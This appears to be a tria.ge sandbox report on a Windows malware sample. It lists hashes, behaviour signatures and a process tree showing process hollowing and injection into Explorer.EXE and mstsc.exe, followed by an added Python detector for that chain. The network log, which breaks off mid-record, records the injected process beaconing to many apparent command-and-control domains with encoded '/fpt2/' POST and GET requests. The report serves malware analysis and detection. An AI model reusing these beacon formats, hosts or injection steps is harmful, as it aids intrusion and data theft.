Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    146s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20231023-en
  • resource tags

    arch:x64, arch:x86, image:win7-20231023-en, locale:en-us, os:windows7-x64, system
  • submitted
    22/11/2023, 05:18 UTC

General

  • Target

    NEW INQ vGT410267234500633.exe

  • Size

    384KB

  • MD5

    d94b223af3fd6bedbc1552ffc63b85cd

  • SHA1

    d7524fd3525faa6af6d4c329167c322062fb77b6

  • SHA256

    bca02faf8b705cffad72deb87ef895ce6626636d498e05b274b079c9ace3dc5b

  • SHA512

    e91ef8c196f5fae0c5f097175c67c2a7a7988d384ee3bba0468deb4c22c6c3292b4b138cd382430922d80d95daed227057870364fdf0ba5ec413dd61c0162955

  • SSDEEP

    12288:RKt9zvWPOpk/oxQD9inI3PnmLws4475zzgBQvamwvq:oLzpxQD9iIPn38zzwi

Score
7/10

Malware Config

Signatures

  • Checks computer location settings (2 TTPs, 1 IoC)

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE (2 IoCs)
  • Loads dropped DLL (4 IoCs)
  • Adds Run key to start application (2 TTPs, 1 IoC)
  • Suspicious use of SetThreadContext (4 IoCs)
  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings (1 TTP, 1 IoC)
  • Suspicious behavior: EnumeratesProcesses (29 IoCs)
  • Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  • Suspicious behavior: MapViewOfSection (8 IoCs)
  • Suspicious use of AdjustPrivilegeToken (2 IoCs)
  • Suspicious use of WriteProcessMemory (18 IoCs)

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of WriteProcessMemory
    PID:1192
    • C:\Users\Admin\AppData\Local\Temp\NEW INQ vGT410267234500633.exe
      "C:\Users\Admin\AppData\Local\Temp\NEW INQ vGT410267234500633.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2432
      • C:\Users\Admin\AppData\Local\Temp\ppxsvdjxm.exe
        "C:\Users\Admin\AppData\Local\Temp\ppxsvdjxm.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Adds Run key to start application
        • Suspicious use of SetThreadContext
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of WriteProcessMemory
        PID:2152
        • C:\Users\Admin\AppData\Local\Temp\ppxsvdjxm.exe
          "C:\Users\Admin\AppData\Local\Temp\ppxsvdjxm.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          PID:2552
    • C:\Windows\SysWOW64\autofmt.exe
      "C:\Windows\SysWOW64\autofmt.exe"
      2⤵
      PID:2644
    • C:\Windows\SysWOW64\mstsc.exe
      "C:\Windows\SysWOW64\mstsc.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of SetThreadContext
      • Modifies Internet Explorer settings
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2896
      • C:\Program Files\Mozilla Firefox\Firefox.exe
        "C:\Program Files\Mozilla Firefox\Firefox.exe"
        3⤵
        PID:1480
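
The process tree above shows a dropped executable (ppxsvdjxm.exe, PID 2152) relaunching its own image (PID 2552) while using SetThreadContext, WriteProcessMemory and MapViewOfSection; Explorer.EXE, itself flagged for WriteProcessMemory, then spawns two argument-less SysWOW64 binaries (autofmt.exe and mstsc.exe), and mstsc.exe in turn shows the same injection APIs and loads a dropped DLL. The Python below is an added example, not part of the tria.ge report or of any tool it names: it transcribes the tree into records and applies three rules that pick out exactly that chain. The field names, the flag labels and the rules themselves are this example's own assumptions.

```python
"""Flag the injection chain visible in a sandbox process tree.

Added example, not part of the tria.ge report or of any tool it names. The
records below are transcribed from the Processes section (PIDs, images and the
per-process behaviour flags); the field names, flag labels and the three rules
are this example's own assumptions.
"""
from __future__ import annotations

from dataclasses import dataclass


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int | None
    image: str
    flags: frozenset


# Constructed from the report's process tree.
TREE = [
    Proc(1192, None, r"C:\Windows\Explorer.EXE",
         frozenset({"GetForegroundWindowSpam", "MapViewOfSection", "WriteProcessMemory"})),
    Proc(2432, 1192, r"C:\Users\Admin\AppData\Local\Temp\NEW INQ vGT410267234500633.exe",
         frozenset({"LoadsDroppedDLL", "WriteProcessMemory"})),
    Proc(2152, 2432, r"C:\Users\Admin\AppData\Local\Temp\ppxsvdjxm.exe",
         frozenset({"ExecutesDroppedEXE", "LoadsDroppedDLL", "AddsRunKey",
                    "SetThreadContext", "MapViewOfSection", "WriteProcessMemory"})),
    Proc(2552, 2152, r"C:\Users\Admin\AppData\Local\Temp\ppxsvdjxm.exe",
         frozenset({"ChecksLocation", "ExecutesDroppedEXE", "SetThreadContext",
                    "EnumeratesProcesses", "MapViewOfSection", "AdjustPrivilegeToken"})),
    Proc(2644, 1192, r"C:\Windows\SysWOW64\autofmt.exe", frozenset()),
    Proc(2896, 1192, r"C:\Windows\SysWOW64\mstsc.exe",
         frozenset({"LoadsDroppedDLL", "SetThreadContext", "ModifiesIESettings",
                    "EnumeratesProcesses", "MapViewOfSection", "AdjustPrivilegeToken",
                    "WriteProcessMemory"})),
    Proc(1480, 2896, r"C:\Program Files\Mozilla Firefox\Firefox.exe", frozenset()),
]

HOLLOW_APIS = frozenset({"SetThreadContext", "WriteProcessMemory"})
INJECT_APIS = HOLLOW_APIS | {"MapViewOfSection"}
SYSTEM_DIR = "c:\\windows\\syswow64\\"


def find_injection_chain(tree):
    """Return (rule, pid, detail) tuples for the hollowing/injection patterns."""
    by_pid = {p.pid: p for p in tree}
    findings = []
    for p in tree:
        parent = by_pid.get(p.ppid)
        # Rule 1: a process relaunches its own image while the parent used
        # SetThreadContext + WriteProcessMemory: the process-hollowing handshake.
        if (parent is not None and parent.image.lower() == p.image.lower()
                and HOLLOW_APIS <= parent.flags):
            findings.append(("self_hollowing", p.pid,
                             f"{parent.pid} relaunched its own image and wrote into it"))
        # Rule 2: the shell writes into other processes and spawns argument-less
        # system binaries: the children are the injected shell's payload hosts.
        if (parent is not None and parent.image.lower().endswith("\\explorer.exe")
                and "WriteProcessMemory" in parent.flags
                and p.image.lower().startswith(SYSTEM_DIR)):
            findings.append(("lolbin_from_injected_shell", p.pid, p.image))
        # Rule 3: a system binary that itself shows the injection APIs is being
        # used as a host (mstsc.exe here also loads a dropped DLL).
        if p.image.lower().startswith(SYSTEM_DIR) and INJECT_APIS <= p.flags:
            findings.append(("system_binary_injects", p.pid, p.image))
    return findings


if __name__ == "__main__":
    for rule, pid, detail in find_injection_chain(TREE):
        print(f"{rule:28} PID {pid:<5} {detail}")
```

Rule 2 fires on autofmt.exe (PID 2644) as well as mstsc.exe even though the report attributes no further behaviour to it; an argument-less system binary launched by a shell that has just been written into is worth keeping as an indicator even when nothing else is observed during the run.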

Network

      • DNS (remote: US)
        www.ljwixsb.top
        Explorer.EXE
        Remote address:
        8.8.8.8:53
        Request
        www.ljwixsb.top
        IN A
        Response
      • DNS (remote: US)
        www.mobdigim.com
        Explorer.EXE
        Remote address:
        8.8.8.8:53
        Request
        www.mobdigim.com
        IN A
        Response
        www.mobdigim.com
        IN CNAME
        mobdigim.com
        mobdigim.com
        IN A
        136.243.92.92
      • GET (remote: DE)
        http://www.mobdigim.com/fpt2/?pz=Hg9XM0UlQopWT4uq/OU/iYY3wdp8Cg94EtrOjqvgZSsCDfQXTUm2cy6B1CuRYksWvpJlBE+O5S0Y+caME5BMYbfNa1l7&YF6=MRgpt-
        Explorer.EXE
        Remote address:
        136.243.92.92:80
        Request
        GET /fpt2/?pz=Hg9XM0UlQopWT4uq/OU/iYY3wdp8Cg94EtrOjqvgZSsCDfQXTUm2cy6B1CuRYksWvpJlBE+O5S0Y+caME5BMYbfNa1l7&YF6=MRgpt- HTTP/1.1
        Host: www.mobdigim.com
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Language: en-US,en;q=0.9
        Connection: close
        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Response
        HTTP/1.1 301 Moved Permanently
        Connection: close
        content-type: text/html
        content-length: 707
        date: Wed, 22 Nov 2023 05:19:15 GMT
        server: LiteSpeed
        location: https://www.mobdigim.com/fpt2/?pz=Hg9XM0UlQopWT4uq/OU/iYY3wdp8Cg94EtrOjqvgZSsCDfQXTUm2cy6B1CuRYksWvpJlBE+O5S0Y+caME5BMYbfNa1l7&YF6=MRgpt-
      • DNS (remote: US)
        www.sqlite.org
        mstsc.exe
        Remote address:
        8.8.8.8:53
        Request
        www.sqlite.org
        IN A
        Response
        www.sqlite.org
        IN A
        45.33.6.223
      • GET (remote: US)
        http://www.sqlite.org/2019/sqlite-dll-win32-x86-3300000.zip
        mstsc.exe
        Remote address:
        45.33.6.223:80
        Request
        GET /2019/sqlite-dll-win32-x86-3300000.zip HTTP/1.1
        Accept: */*
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
        Host: www.sqlite.org
        Connection: Keep-Alive
        Response
        HTTP/1.1 200 OK
        Connection: keep-alive
        Date: Wed, 22 Nov 2023 05:19:17 GMT
        Last-Modified: Fri, 04 Oct 2019 22:26:08 GMT
        Cache-Control: max-age=120
        ETag: "m5d97c700s778c6"
        Content-type: application/zip; charset=utf-8
        Content-length: 489670
      • DNS (remote: US)
        www.finebb.net
        Explorer.EXE
        Remote address:
        8.8.8.8:53
        Request
        www.finebb.net
        IN A
        Response
        www.finebb.net
        IN A
        91.194.2.86
      • POST (remote: RU)
        http://www.finebb.net/fpt2/
        Explorer.EXE
        Remote address:
        91.194.2.86:80
        Request
        POST /fpt2/ HTTP/1.1
        Host: www.finebb.net
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Language: en-US,en;q=0.9
        Accept-Encoding: gzip, deflate, br
        Origin: http://www.finebb.net
        Referer: http://www.finebb.net/fpt2/
        Cache-Control: no-cache
        Connection: close
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 183
        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Response
        HTTP/1.1 301 Moved Permanently
        Server: nginx
        Date: Wed, 22 Nov 2023 05:19:38 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Location: https://finebb.net/fpt2/
        Cache-Control: must-revalidate
        Set-Cookie: uid=W8ICVmVdj2qiuz6uA3ZvAgA=; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/
      • GET (remote: RU)
        http://www.finebb.net/fpt2/?pz=a03iXbdPIix9fRMHzU7LE8iAlr5ha2Q41Lr6ixgTxj+lXehLxFWfCCOIk5GT/BjW7D2eUV/ItGi5aEAe2DnFKsm9EzqL&YF6=MRgpt-
        Explorer.EXE
        Remote address:
        91.194.2.86:80
        Request
        GET /fpt2/?pz=a03iXbdPIix9fRMHzU7LE8iAlr5ha2Q41Lr6ixgTxj+lXehLxFWfCCOIk5GT/BjW7D2eUV/ItGi5aEAe2DnFKsm9EzqL&YF6=MRgpt- HTTP/1.1
        Host: www.finebb.net
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Language: en-US,en;q=0.9
        Connection: close
        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Response
        HTTP/1.1 301 Moved Permanently
        Server: nginx
        Date: Wed, 22 Nov 2023 05:19:41 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Location: https://finebb.net/fpt2/?pz=a03iXbdPIix9fRMHzU7LE8iAlr5ha2Q41Lr6ixgTxj+lXehLxFWfCCOIk5GT/BjW7D2eUV/ItGi5aEAe2DnFKsm9EzqL&YF6=MRgpt-
        Cache-Control: must-revalidate
        Set-Cookie: uid=W8ICVmVdj22iuz6uA3aAAgA=; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/
      • DNS (remote: US)
        www.yf168vip.com
        Explorer.EXE
        Remote address:
        8.8.8.8:53
        Request
        www.yf168vip.com
        IN A
        Response
        www.yf168vip.com
        IN CNAME
        bt-cn-3.168-system.com
        bt-cn-3.168-system.com
        IN A
        34.92.57.107
      • POST (remote: HK)
        http://www.yf168vip.com/fpt2/
        Explorer.EXE
        Remote address:
        34.92.57.107:80
        Request
        POST /fpt2/ HTTP/1.1
        Host: www.yf168vip.com
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Language: en-US,en;q=0.9
        Accept-Encoding: gzip, deflate, br
        Origin: http://www.yf168vip.com
        Referer: http://www.yf168vip.com/fpt2/
        Cache-Control: no-cache
        Connection: close
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 183
        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Response
        HTTP/1.1 404 Not Found
        Server: nginx
        Date: Wed, 22 Nov 2023 05:19:34 GMT
        Content-Type: text/html
        Content-Length: 548
        Connection: close
      • GET (remote: HK)
        http://www.yf168vip.com/fpt2/?pz=+Pv5RKJKlOGhsp9xzDjtrCt3KaT+wN1FLngvtNJPFyCXQ9yT2cbGZ5T7ZO2Qq14r+5AArPVFnIkI6MVJnjcaY83B5jvg&YF6=MRgpt-
        Explorer.EXE
        Remote address:
        34.92.57.107:80
        Request
        GET /fpt2/?pz=+Pv5RKJKlOGhsp9xzDjtrCt3KaT+wN1FLngvtNJPFyCXQ9yT2cbGZ5T7ZO2Qq14r+5AArPVFnIkI6MVJnjcaY83B5jvg&YF6=MRgpt- HTTP/1.1
        Host: www.yf168vip.com
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Language: en-US,en;q=0.9
        Connection: close
        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Response
        HTTP/1.1 404 Not Found
        Server: nginx
        Date: Wed, 22 Nov 2023 05:19:36 GMT
        Content-Type: text/html
        Content-Length: 548
        Connection: close
      • DNS (remote: US)
        www.shortfall.net
        Explorer.EXE
        Remote address:
        8.8.8.8:53
        Request
        www.shortfall.net
        IN A
        Response
        www.shortfall.net
        IN A
        13.248.169.48
        www.shortfall.net
        IN A
        76.223.54.146
      • POST (remote: US)
        http://www.shortfall.net/fpt2/
        Explorer.EXE
        Remote address:
        13.248.169.48:80
        Request
        POST /fpt2/ HTTP/1.1
        Host: www.shortfall.net
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Language: en-US,en;q=0.9
        Accept-Encoding: gzip, deflate, br
        Origin: http://www.shortfall.net
        Referer: http://www.shortfall.net/fpt2/
        Cache-Control: no-cache
        Connection: close
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 183
        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Response
        HTTP/1.1 405 Not Allowed
        Server: openresty
        Date: Wed, 22 Nov 2023 05:19:42 GMT
        Content-Type: text/html
        Content-Length: 556
        Connection: close
        X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_A0tSUQlWfk9RcYiBisFjUp4mJhZjoalv4NIolWeZ1z/VwC4r2T9Lxeabwd6qYQX7b07cV5twCRWXJSV7TsJ7Ig
      • GET (remote: US)
        http://www.shortfall.net/fpt2/?pz=BEk/HyvD1ApKclZgHhHVoRJGXzHFyBd9iCFWFrLupWJDmJhCU+tan5xFERllc5FlkjcoiH4tpQ3GJxurFh9q9fs5VQOK&YF6=MRgpt-
        Explorer.EXE
        Remote address:
        13.248.169.48:80
        Request
        GET /fpt2/?pz=BEk/HyvD1ApKclZgHhHVoRJGXzHFyBd9iCFWFrLupWJDmJhCU+tan5xFERllc5FlkjcoiH4tpQ3GJxurFh9q9fs5VQOK&YF6=MRgpt- HTTP/1.1
        Host: www.shortfall.net
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Language: en-US,en;q=0.9
        Connection: close
        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Response
        HTTP/1.1 200 OK
        Server: openresty
        Date: Wed, 22 Nov 2023 05:19:44 GMT
        Content-Type: text/html
        Content-Length: 12477
        Last-Modified: Mon, 13 Nov 2023 23:35:47 GMT
        Connection: close
        ETag: "6552b2d3-30bd"
        X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_RCsCR8ZgI9ytHdgPNLErkSd00hq1wEsr07VzeJRcQ3XIQuOyvFZLYy0I+fUz+/HYWTFLzmqRMD+r0HmvhCDnCA
        Cache-Control: no-cache
        X-Content-Type-Options: nosniff
        Set-Cookie: caf_ipaddr=10.116.88.58;Path=/;Max-Age=86400;
        Set-Cookie: country=;Path=/;Max-Age=86400;
        Set-Cookie: city="";Path=/;Max-Age=86400;
        Set-Cookie: expiry_partner=;Path=/;Max-Age=86400;
        Accept-Ranges: bytes
      • DNS (remote: US)
        www.tecverse.xyz
        Explorer.EXE
        Remote address:
        8.8.8.8:53
        Request
        www.tecverse.xyz
        IN A
        Response
        www.tecverse.xyz
        IN A
        203.161.61.170
      • POST (remote: US)
        http://www.tecverse.xyz/fpt2/
        Explorer.EXE
        Remote address:
        203.161.61.170:80
        Request
        POST /fpt2/ HTTP/1.1
        Host: www.tecverse.xyz
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Language: en-US,en;q=0.9
        Accept-Encoding: gzip, deflate, br
        Origin: http://www.tecverse.xyz
        Referer: http://www.tecverse.xyz/fpt2/
        Cache-Control: no-cache
        Connection: close
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 183
        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Response
        HTTP/1.1 404 Not Found
        Date: Wed, 22 Nov 2023 05:19:50 GMT
        Server: Apache
        Content-Length: 690
        Connection: close
        Content-Type: text/html
      • GET (remote: US)
        http://www.tecverse.xyz/fpt2/?pz=kmEA0abd5YyeJVI62R5X7XpLu+SmFuKVzFUIPRx4j4eSHm+QbJspSaqzIrLQdJsv4iNbR93ZPS2DputNIuZEk+22xRga&YF6=MRgpt-
        Explorer.EXE
        Remote address:
        203.161.61.170:80
        Request
        GET /fpt2/?pz=kmEA0abd5YyeJVI62R5X7XpLu+SmFuKVzFUIPRx4j4eSHm+QbJspSaqzIrLQdJsv4iNbR93ZPS2DputNIuZEk+22xRga&YF6=MRgpt- HTTP/1.1
        Host: www.tecverse.xyz
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Language: en-US,en;q=0.9
        Connection: close
        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Response
        HTTP/1.1 404 Not Found
        Date: Wed, 22 Nov 2023 05:19:52 GMT
        Server: Apache
        Content-Length: 690
        Connection: close
        Content-Type: text/html; charset=utf-8
      • DNS (remote: US)
        www.hreeremaeps.com
        Explorer.EXE
        Remote address:
        8.8.8.8:53
        Request
        www.hreeremaeps.com
        IN A
        Response
        www.hreeremaeps.com
        IN CNAME
        hreeremaeps.com
        hreeremaeps.com
        IN A
        185.83.146.204
      • POST (remote: TR)
        http://www.hreeremaeps.com/fpt2/
        Explorer.EXE
        Remote address:
        185.83.146.204:80
        Request
        POST /fpt2/ HTTP/1.1
        Host: www.hreeremaeps.com
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Language: en-US,en;q=0.9
        Accept-Encoding: gzip, deflate, br
        Origin: http://www.hreeremaeps.com
        Referer: http://www.hreeremaeps.com/fpt2/
        Cache-Control: no-cache
        Connection: close
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 183
        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Response
        HTTP/1.0 404 Not Found
        Date: Wed, 22 Nov 2023 05:19:58 GMT
        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
        X-Powered-By: PHP/5.4.16
        Content-Length: 0
        Connection: close
        Content-Type: text/html; charset=UTF-8
      • GET (remote: TR)
        http://www.hreeremaeps.com/fpt2/?pz=PVLQ1OYcDtmtS6mlaIs9mafN1rqX6opagePU/1WVbH2sXsdip4LlZsLtbV4mevB5sNCA1FFZdfEVrxwxl5AqGiugiysq&YF6=MRgpt-
        Explorer.EXE
        Remote address:
        185.83.146.204:80
        Request
        GET /fpt2/?pz=PVLQ1OYcDtmtS6mlaIs9mafN1rqX6opagePU/1WVbH2sXsdip4LlZsLtbV4mevB5sNCA1FFZdfEVrxwxl5AqGiugiysq&YF6=MRgpt- HTTP/1.1
        Host: www.hreeremaeps.com
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Language: en-US,en;q=0.9
        Connection: close
        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Response
        HTTP/1.0 404 Not Found
        Date: Wed, 22 Nov 2023 05:20:00 GMT
        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
        X-Powered-By: PHP/5.4.16
        Content-Length: 0
        Connection: close
        Content-Type: text/html; charset=UTF-8
      • DNS (remote: US)
        www.shopbons-mall.com
        Explorer.EXE
        Remote address:
        8.8.8.8:53
        Request
        www.shopbons-mall.com
        IN A
        Response
        www.shopbons-mall.com
        IN A
        208.91.197.132
      • POST (remote: US)
        http://www.shopbons-mall.com/fpt2/
        Explorer.EXE
        Remote address:
        208.91.197.132:80
        Request
        POST /fpt2/ HTTP/1.1
        Host: www.shopbons-mall.com
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Language: en-US,en;q=0.9
        Accept-Encoding: gzip, deflate, br
        Origin: http://www.shopbons-mall.com
        Referer: http://www.shopbons-mall.com/fpt2/
        Cache-Control: no-cache
        Connection: close
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 183
        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
      • GET (remote: US)
        http://www.shopbons-mall.com/fpt2/?pz=6UkeOgRo4ePloh1yFoxHPsMfzZ6p6zlaujZ8SKHBP3+vyOlbx4lZ4H+sEihSMXlzaeFJp2Nsdm5H90jVgpEuC4hvrEHL&YF6=MRgpt-
        Explorer.EXE
        Remote address:
        208.91.197.132:80
        Request
        GET /fpt2/?pz=6UkeOgRo4ePloh1yFoxHPsMfzZ6p6zlaujZ8SKHBP3+vyOlbx4lZ4H+sEihSMXlzaeFJp2Nsdm5H90jVgpEuC4hvrEHL&YF6=MRgpt- HTTP/1.1
        Host: www.shopbons-mall.com
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Language: en-US,en;q=0.9
        Connection: close
        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Response
        HTTP/1.1 200 OK
        Date: Wed, 22 Nov 2023 05:20:08 GMT
        Server: Apache
        Transfer-Encoding: chunked
        Content-Type: text/html; charset=UTF-8
        Connection: close
      • DNS (remote: US)
        www.cmmug.asia
        Explorer.EXE
        Remote address:
        8.8.8.8:53
        Request
        www.cmmug.asia
        IN A
        Response
        www.cmmug.asia
        IN A
        188.114.96.0
        www.cmmug.asia
        IN A
        188.114.97.0
      • POST (remote: US)
        http://www.cmmug.asia/fpt2/
        Explorer.EXE
        Remote address:
        188.114.96.0:80
        Request
        POST /fpt2/ HTTP/1.1
        Host: www.cmmug.asia
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Language: en-US,en;q=0.9
        Accept-Encoding: gzip, deflate, br
        Origin: http://www.cmmug.asia
        Referer: http://www.cmmug.asia/fpt2/
        Cache-Control: no-cache
        Connection: close
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 183
        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Response
        HTTP/1.1 502 Bad Gateway
        Date: Wed, 22 Nov 2023 05:20:14 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 6325
        Connection: close
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Or5sRs6IDBbh%2BoD2CZPC80JTAcbwgqaqlRetwdyN7T%2FM2kFevh6%2BzQxOxhJslCCp8%2Bc51RZ%2Bbf5D12ZQslJx5ssRBMAbnKIDE9NqJUXP1%2BEfEW7nc%2BVR79hpx24LbXmiAA%3D%3D"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        X-Frame-Options: SAMEORIGIN
        Referrer-Policy: same-origin
        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
        Expires: Thu, 01 Jan 1970 00:00:01 GMT
        Server: cloudflare
        CF-RAY: 829eb8db58511ece-AMS
        alt-svc: h3=":443"; ma=86400
      • GET (remote: US)
        http://www.cmmug.asia/fpt2/?pz=v+WmR1cg7tS0xW3sxOcH7qLyIjHIvwIYt3SWFLykJ0c2lILgMSLvRqA6qw3Mnj882j+rmYnjx3WL99L/u7fVyIhDBdb9&YF6=MRgpt-
        Explorer.EXE
        Remote address:
        188.114.96.0:80
        Request
        GET /fpt2/?pz=v+WmR1cg7tS0xW3sxOcH7qLyIjHIvwIYt3SWFLykJ0c2lILgMSLvRqA6qw3Mnj882j+rmYnjx3WL99L/u7fVyIhDBdb9&YF6=MRgpt- HTTP/1.1
        Host: www.cmmug.asia
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Language: en-US,en;q=0.9
        Connection: close
        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Response
        HTTP/1.1 502 Bad Gateway
        Date: Wed, 22 Nov 2023 05:20:17 GMT
        Content-Type: text/plain; charset=UTF-8
        Content-Length: 15
        Connection: close
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=67yG8PpQRAA8EpJluWDwC5oNoCScc%2FJlFrrij%2Bjpl3WRJ5LWcLAaabXu1ktHC%2BjEfkojNC56Vusb7BCcP%2F491a3wGdMfFYhTNA2tgmpcUPvDSYTr1CpdpL8F53pP3%2BcS9w%3D%3D"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        X-Frame-Options: SAMEORIGIN
        Referrer-Policy: same-origin
        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
        Expires: Thu, 01 Jan 1970 00:00:01 GMT
        Server: cloudflare
        CF-RAY: 829eb8eb3e8966c3-AMS
        alt-svc: h3=":443"; ma=86400
      • DNS (remote: US)
        www.333vvs.com
        Explorer.EXE
        Remote address:
        8.8.8.8:53
        Request
        www.333vvs.com
        IN A
        Response
        www.333vvs.com
        IN A
        34.120.175.65
        www.333vvs.com
        IN A
        35.244.161.158
      • POST (remote: US)
